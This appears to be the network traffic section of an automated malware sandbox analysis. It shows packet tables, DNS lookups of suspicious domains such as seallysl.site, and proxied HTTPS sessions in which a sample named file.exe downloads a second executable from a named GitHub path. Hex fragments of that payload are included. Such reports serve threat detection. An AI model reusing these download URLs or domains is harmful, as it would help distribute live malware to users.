Oct 29, 2024 22:04:17.742229939 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.742264986 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.742276907 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.742300034 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.742319107 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.742894888 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.742917061 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.742948055 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.742959976 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.742985964 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.743000031 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.743067026 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.743088961 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.743119001 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.743130922 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.743156910 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.743170977 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.803512096 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.803534031 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.803602934 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.803642988 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.803689003 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.803689957 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.864963055 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.864993095 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865037918 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865052938 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865077972 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865098000 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865351915 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865375996 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865411043 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865422964 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865447044 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865463972 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865668058 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865689039 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865717888 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865731001 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865770102 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865775108 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865775108 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865803003 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865837097 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.865878105 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.865922928 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.866185904 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:22.311052084 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:22.311119080 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:22.311206102 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:22.312165976 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:22.312202930 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:22.986248016 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:22.986375093 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:22.990603924 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:22.990638971 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:22.991064072 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:23.032682896 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:23.053565025 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:23.053603888 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:23.053962946 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:23.500350952 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:23.500621080 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:23.500983000 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:23.502981901 CET	49738	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:23.503016949 CET	443	49738	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:23.557087898 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:23.557161093 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:23.557265043 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:23.557538986 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:23.557578087 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.179718018 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.179898024 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.181132078 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.181157112 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.181663990 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.182996988 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.183037996 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.183114052 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.909445047 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.909610987 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.909708023 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.909802914 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.909800053 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.909837961 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.909862041 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.909909010 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.909957886 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.909997940 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.910013914 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.910046101 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:24.910074949 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.954565048 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:24.954585075 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.001435995 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.026942968 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.027034044 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.027074099 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.027111053 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.027143955 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.027165890 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.027196884 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.027264118 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.027328968 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.027504921 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.027538061 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.027565002 CET	49739	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.027582884 CET	443	49739	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.150707960 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.150839090 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.150943041 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.151262045 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.151298046 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.770953894 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.771065950 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.772394896 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.772423983 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.772932053 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.774298906 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.774445057 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.774487019 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:25.774574995 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:25.774590015 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:31.448678017 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:31.448908091 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:31.448940039 CET	443	49740	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:31.449359894 CET	49740	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:31.550499916 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:31.550578117 CET	443	49741	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:31.550667048 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:31.551388979 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:31.551424980 CET	443	49741	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:32.201174974 CET	443	49741	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:32.201272011 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.202439070 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.202456951 CET	443	49741	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:32.202809095 CET	443	49741	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:32.203910112 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.204025984 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.204086065 CET	443	49741	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:32.760536909 CET	443	49741	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:32.760778904 CET	443	49741	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:32.760840893 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.760898113 CET	49741	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.950916052 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.950980902 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:32.951060057 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.951360941 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:32.951380968 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:33.597179890 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:33.597291946 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:33.598510981 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:33.598542929 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:33.599505901 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:33.600667000 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:33.600811958 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:33.600858927 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:33.600950956 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:33.600969076 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:37.333503008 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:37.333632946 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:37.333690882 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:37.333940029 CET	49742	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:37.333961964 CET	443	49742	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:37.679409027 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:37.679493904 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:37.679570913 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:37.679960012 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:37.679996967 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:38.293498039 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:38.293697119 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:38.294950008 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:38.294984102 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:38.295357943 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:38.296540976 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:38.296652079 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:38.296664000 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:42.263628006 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:42.263767004 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:42.263860941 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:42.264087915 CET	49743	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:42.264131069 CET	443	49743	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:42.824312925 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:42.824404001 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:42.824585915 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:42.824826002 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:42.824860096 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.432244062 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.432466030 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.433542967 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.433573961 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.433914900 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.439352036 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.440063000 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.440123081 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.440248013 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.440304995 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.440433025 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.440543890 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.440695047 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.440732956 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.440895081 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.440949917 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.441142082 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.441181898 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.441190004 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.441378117 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.441433907 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.450575113 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.450793982 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.450850964 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.450858116 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.450881958 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.450891018 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.450984955 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.451059103 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.451121092 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.451189995 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.457405090 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:43.457484007 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:43.457515001 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:49.820713997 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:49.820993900 CET	443	49744	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:49.821002960 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:49.821069956 CET	49744	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:49.845199108 CET	49745	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:49.845293045 CET	443	49745	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:49.845376968 CET	49745	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:49.845655918 CET	49745	443	192.168.2.4	172.67.180.76
Oct 29, 2024 22:04:49.845693111 CET	443	49745	172.67.180.76	192.168.2.4
Oct 29, 2024 22:04:50.251549006 CET	49745	443	192.168.2.4	172.67.180.76

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 22:04:13.234072924 CET	61822	53	192.168.2.4	1.1.1.1
Oct 29, 2024 22:04:13.241933107 CET	53	61822	1.1.1.1	192.168.2.4
Oct 29, 2024 22:04:14.775702000 CET	58128	53	192.168.2.4	1.1.1.1
Oct 29, 2024 22:04:14.783411980 CET	53	58128	1.1.1.1	192.168.2.4
Oct 29, 2024 22:04:22.279673100 CET	63153	53	192.168.2.4	1.1.1.1
Oct 29, 2024 22:04:22.289902925 CET	53	63153	1.1.1.1	192.168.2.4
Oct 29, 2024 22:04:22.292432070 CET	49856	53	192.168.2.4	1.1.1.1
Oct 29, 2024 22:04:22.306391954 CET	53	49856	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 29, 2024 22:04:13.234072924 CET	192.168.2.4	1.1.1.1	0x5e39	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:14.775702000 CET	192.168.2.4	1.1.1.1	0xb987	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:22.279673100 CET	192.168.2.4	1.1.1.1	0x1fba	Standard query (0)	ponintnykqwm.shop	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:22.292432070 CET	192.168.2.4	1.1.1.1	0x3e42	Standard query (0)	seallysl.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 29, 2024 22:04:13.241933107 CET	1.1.1.1	192.168.2.4	0x5e39	No error (0)	github.com		140.82.121.4	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:14.783411980 CET	1.1.1.1	192.168.2.4	0xb987	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:14.783411980 CET	1.1.1.1	192.168.2.4	0xb987	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:14.783411980 CET	1.1.1.1	192.168.2.4	0xb987	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:14.783411980 CET	1.1.1.1	192.168.2.4	0xb987	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:22.289902925 CET	1.1.1.1	192.168.2.4	0x1fba	Name error (3)	ponintnykqwm.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:22.306391954 CET	1.1.1.1	192.168.2.4	0x3e42	No error (0)	seallysl.site		172.67.180.76	A (IP address)	IN (0x0001)	false
Oct 29, 2024 22:04:22.306391954 CET	1.1.1.1	192.168.2.4	0x3e42	No error (0)	seallysl.site		104.21.43.145	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

raw.githubusercontent.com

seallysl.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	140.82.121.4	443	7300	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 21:04:14 UTC	110	OUT	GET /vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-10-29 21:04:14 UTC	561	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Tue, 29 Oct 2024 21:04:14 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: Location: https://raw.githubusercontent.com/vonuch1/start/refs/heads/main/khtoawdltrha.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-10-29 21:04:14 UTC	3384	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.199.109.133	443	7300	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 21:04:15 UTC	121	OUT	GET /vonuch1/start/refs/heads/main/khtoawdltrha.exe HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-10-29 21:04:15 UTC	903	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1290240 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "2011826a09bfb367cba9fbc47f154dd525a0107b32e88aa4420c5b7ecb319c80" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: EC24:1506CB:BE3C06:CE5819:67214DCD Accept-Ranges: bytes Date: Tue, 29 Oct 2024 21:04:15 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdal2120062-DFW X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1730235856.506777,VS0,VE145 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 0108f3e167b33150a45d603285058fa0e1b2fa36 Expires: Tue, 29 Oct 2024 21:09:15 GMT Source-Age: 0
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 a7 cd 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 44 04 00 00 d4 00 00 00 00 00 00 16 8b 01 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 3c 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 d0 2d 00 14 02 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELgD@0<@ -
2024-10-29 21:04:15 UTC	1378	IN	Data Raw: 76 12 85 a8 86 bf f8 9c 92 0e 22 88 fb 4b 6b 41 a2 b1 1d f7 19 ab ab 34 9c 3f 78 8d 75 e0 53 fe f3 a0 ae 8e e7 73 f2 41 a5 eb 4a 8f d8 b1 3f 0f 7d d8 d5 6b cd fd 3a 21 8b 49 16 cb 58 f7 1b fb 86 5e 86 b4 de 78 14 4a 5e 77 e4 25 e4 c3 80 83 3e 50 c1 95 65 b7 42 c9 b3 0f 04 95 f0 f2 b4 0c d9 ef 6f 29 4c 81 25 84 84 fa e2 74 26 7e 20 8d 99 19 7f 4a 8b d3 db d1 55 48 f0 bb aa 4a 4d 87 7c 8e ed 6a 99 2c d8 a9 03 b0 be ab ed 29 e0 4d a3 c3 36 a7 96 a5 39 b9 75 2d e0 2f d7 8a 41 f3 58 46 6b b1 0f ef 57 eb e9 88 79 fe 26 1b 8e 98 6e cf 5f 25 d2 34 e2 85 32 5e b8 c3 a3 ea 40 cf c1 81 35 7c 1f ad 00 ba 6b 0b a4 5b 46 d8 51 80 2b 7c 33 dd 6c 6d 02 37 22 36 e4 71 29 2c 96 68 a9 7a 6c ff bc dd 93 b2 9f 97 cd cf 75 7d 5c 58 9d b9 dd 36 03 18 93 ca bb ac d1 c1 c1 17 25 Data Ascii: v"KkA4?xuSsAJ?}k:!IX^xJ^w%>PeBo)L%t&~ 